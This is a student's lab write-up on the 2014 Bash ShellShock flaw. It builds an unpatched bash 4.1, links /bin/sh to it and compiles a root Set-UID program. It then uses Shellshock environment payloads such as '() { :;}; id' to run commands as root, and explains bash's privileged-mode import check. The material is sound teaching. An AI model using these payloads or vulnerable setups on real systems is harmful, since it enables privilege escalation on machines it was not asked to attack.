Lv Jianwen 20199303, "Linux Kernel Principles and Analysis", week 12 assignment

ShellShock Challenge Experiment

On September 24, 2014, a serious flaw in Bash, Shellshock, was disclosed. The vulnerability is present on many systems and can be triggered both remotely and locally. In this experiment, students reproduce the attack themselves in order to understand the vulnerability, and then answer some questions.

What is ShellShock?

Shellshock, also known as Bashdoor, is a security vulnerability in the Bash shell that is widely used on Unix systems; it was first disclosed on September 24, 2014. Many Internet daemons, such as web servers, use Bash to process certain commands, which allows an attacker to execute arbitrary code on vulnerable versions of Bash. This can be exploited to gain unauthorized access to a computer system. - Excerpt from Wikipedia

1. Setting up the environment

Install bash 4.1 from source with root privileges. The distribution-supplied bash has been patched since September 2014 (the bug is in every unpatched upstream release up to 4.3), so a deliberately old, unpatched build is needed to reproduce the attack.
The original bash 4.1 download address is http://ftp.gnu.org/gnu/bash/bash-4.1.tar.gz; for speed, this lab uses the mirror http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz instead.
Download:

sudo su
wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz  

Install:

$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure   # this step takes a while, please wait
$ make && make install   # with the default prefix this installs /usr/local/bin/bash

After installation, confirm that the vulnerable binary is the one on your PATH: `which bash` and `bash --version` should point at the freshly built 4.1, not the distribution's patched bash.


First, get familiar with bash user-defined functions: once a function is defined, it is called simply by using its name as a command. Functions can also be exported to child shells through the environment, and that import path is exactly where Shellshock lives.
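The following script is an added example, not part of the original lab. It shows how a bash function is called by name and handed to a child bash through the environment, what the exported text looks like, and the standard Shellshock probe that distinguishes a patched bash from a vulnerable one. The script itself is POSIX sh; every bash-specific step is run in an explicit `bash` child so it behaves the same whether started from sh or bash.

```shell
#!/bin/sh
# Added example (not from the original lab): bash function export, the
# environment encoding behind it, and the CVE-2014-6271 probe.

# A bash function is called simply by using its name as a command. `export -f`
# places it in the environment, and a child bash re-creates it at startup by
# parsing the exported text.
exported_function_demo() {
    bash -c '
        greet() { echo "hello from $1"; }
        export -f greet
        bash -c "greet child"
    '
}

# The wire format: the exported function is an environment string whose value
# begins with "() {". Pre-patch bash used the plain name (greet=() { ...);
# patched bash prefixes it (BASH_FUNC_greet%%=() { ...). The pattern accepts
# both forms and prints how many matching environment entries exist.
exported_function_encoding() {
    bash -c '
        greet() { echo hi; }
        export -f greet
        env | grep -c "greet[^=]*=() {"
    '
}

# Shellshock probe. A vulnerable bash keeps parsing past the closing brace of
# the function body and runs the trailing `echo vulnerable` while importing
# the variable; a patched bash treats x as an ordinary string variable.
shellshock_probe() {
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

exported_function_demo
exported_function_encoding
shellshock_probe
```

On the bash 4.1 built above, `shellshock_probe` prints `vulnerable`; on any distribution bash patched after September 2014 it prints `patched`, while the first two functions behave identically on both, because function export itself was never removed, only the unsafe parsing of it.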

Attacking a Set-UID program

We know that system() runs the given command through "/bin/sh -c", so when /bin/sh is bash, /bin/bash is what actually gets invoked. Can the Shellshock bug therefore be used to gain privileges? First make sure you are running the vulnerable bash version, and make /bin/sh point to /bin/bash:
$ sudo ln -sf /bin/bash /bin/sh
Note that `make install` above puts the new bash in /usr/local/bin by default, so check which binary /bin/sh now resolves to with `/bin/sh -c 'echo $BASH_VERSION'`; it must report the vulnerable 4.1 build for the rest of the experiment to work.
Then create a new file shock.c in the /home/shiyanlou directory:

vi shock.c  

Contents:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        setuid(geteuid()); /* make real uid = effective uid */
        system("/bin/ls -l");  /* runs "/bin/sh -c '/bin/ls -l'" */
        return 0;
    }

Compile the code and make it a Set-UID program; compiling as root ensures the binary is owned by root:

$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock    

Note that setuid(geteuid()) is used here to make the real uid equal to the effective uid. This is not common practice in Set-UID programs, but it does happen in real code. Try hacking it yourself first :) The hack process follows.

If the setuid(geteuid()) statement is removed and the attack is tried again, no privileges are obtained.

This shows that when the real uid and effective uid are the same, the function definitions carried in environment variables take effect inside the program, so the Shellshock bug can be exploited; when the two uids differ, the environment definitions are ignored and the attack cannot be launched. This can be confirmed from the bash source code (variables.c, lines 308 to 369). Point out which line causes the difference, and explain why bash is designed this way.

The key part, extracted and simplified:

void initialize_shell_variables (env, privmode)
{
    /* Walk every string in the environment. */
    for (string_index = 0; string = env[string_index++]; ) {
        /* ... */
        /* If the value is an exported function, define it here. */
        /* Functions are NOT imported when bash runs in privileged mode
           (the -p option, or a real uid / effective uid mismatch). */
        if (privmode == 0 && read_but_dont_execute == 0 &&
            STREQN ("() {", string, 4)) {
            [...]
            /* This is where Shellshock happens: the whole string, the
               function definition plus anything appended after it, is
               parsed and executed. */
            parse_and_execute (temp_string, name,
                               SEVAL_NONINT|SEVAL_NOHIST);
            [...]
        }
    }
}

The `if` condition above is the line that makes the difference. `privmode` is not a "private mode": it is bash's privileged-mode flag, and the caller passes it in as `privileged_mode || running_setuid`, so it is set either by the `-p` option or whenever bash notices at startup that its real and effective uid (or gid) differ. When the flag is set, the function-import branch is skipped entirely and the attacker-supplied definition is never parsed, so the Shellshock bug is unreachable. bash is designed this way because the environment of a Set-UID program is controlled entirely by the unprivileged caller: importing functions from it would let anyone who can run the program execute code of their choosing with the program's elevated privileges. For the same reason bash also drops the elevated effective uid in that situation unless `-p` was given. With setuid(geteuid()) in shock.c the two uids match, bash sees nothing suspicious, imports the function, and the bug becomes exploitable as root.
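The `privmode` condition can be observed from outside bash without root and on any bash version, because `-p` sets the same `privileged_mode` flag that a uid mismatch sets. The script below is an added example, not part of the original lab: it exports a function from a parent bash and checks whether an ordinary child and a `bash -p` child inherit it, then applies the same idea to the lab's setuid binary. The `./shock` path and the `id` payload are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the original lab): the `privmode == 0` import check
# seen from outside. bash passes `privileged_mode || running_setuid` as
# privmode, so `bash -p` blocks function import exactly as a setuid-detected
# bash (real uid != effective uid) does. Needs no root.

# Returns 0 if a child bash started with $1 as extra options can see the
# function `foo` exported by its parent, non-zero otherwise.
child_sees_function() {
    flags="$1"
    bash -c '
        foo() { echo "imported"; }
        export -f foo
        bash '"$flags"' -c "type foo >/dev/null 2>&1"
    '
}

# Convenience wrapper that prints "imported" or "blocked".
import_status() {
    if child_sees_function "$1"; then
        echo imported
    else
        echo blocked
    fi
}

# The same check against the lab's Set-UID binary, if it has been built in the
# current directory (assumption: ./shock from the listing above). With the
# vulnerable bash and real uid == effective uid, the trailing `id` in the
# payload runs as root before `ls -l` does; with the setuid(geteuid()) line
# removed, bash sees the uid mismatch, sets privmode, and never imports foo.
shock_probe() {
    if [ -x ./shock ]; then
        env foo='() { :;}; id' ./shock
    else
        echo "./shock not found; build it first"
    fi
}

echo "normal child:     $(import_status "")"
echo "privileged child: $(import_status "-p")"
shock_probe
```

On a patched bash the two `import_status` lines still print `imported` and `blocked`, because the `-p` rule predates Shellshock and was never changed; the patches only changed how (and whether) a plain environment string is parsed, which is what `shock_probe` exercises on the 4.1 build.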


Source: www.cnblogs.com/besti-20199303/p/12006841.html